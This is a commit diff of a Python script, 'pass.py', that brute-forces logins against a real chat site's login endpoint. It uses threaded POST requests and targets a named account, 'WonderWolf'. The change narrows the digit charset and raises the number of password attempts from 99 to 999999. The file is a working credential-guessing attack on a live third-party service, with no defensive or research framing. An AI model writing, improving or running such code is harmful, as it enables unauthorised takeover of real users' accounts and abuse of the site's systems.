asv7j commited on
Commit
e692337
·
verified ·
1 Parent(s): 407aac9

Update pass.py

Browse files
Files changed (1) hide show
  1. pass.py +2 -2
pass.py CHANGED
@@ -3,7 +3,7 @@ import time
3
  from concurrent.futures import ThreadPoolExecutor, as_completed
4
 
5
  def send_login(username, number_of_attempts):
6
- charset = '1234567890'
7
  # Function to send login request
8
  def send_request(upass):
9
  response = requests.post('https://girlschat.org/chat/system/encoded/login.php', data={
@@ -44,7 +44,7 @@ start = time.time()
44
 
45
  # Example usage
46
  username = 'WonderWolf' # Replace with actual username
47
- number_of_attempts = 99 # Set the number of password attempts
48
  send_login(username, number_of_attempts)
49
  end = time.time()
50
  print(end - start)
 
3
  from concurrent.futures import ThreadPoolExecutor, as_completed
4
 
5
  def send_login(username, number_of_attempts):
6
+ charset = '846219'
7
  # Function to send login request
8
  def send_request(upass):
9
  response = requests.post('https://girlschat.org/chat/system/encoded/login.php', data={
 
44
 
45
  # Example usage
46
  username = 'WonderWolf' # Replace with actual username
47
+ number_of_attempts = 999999 # Set the number of password attempts
48
  send_login(username, number_of_attempts)
49
  end = time.time()
50
  print(end - start)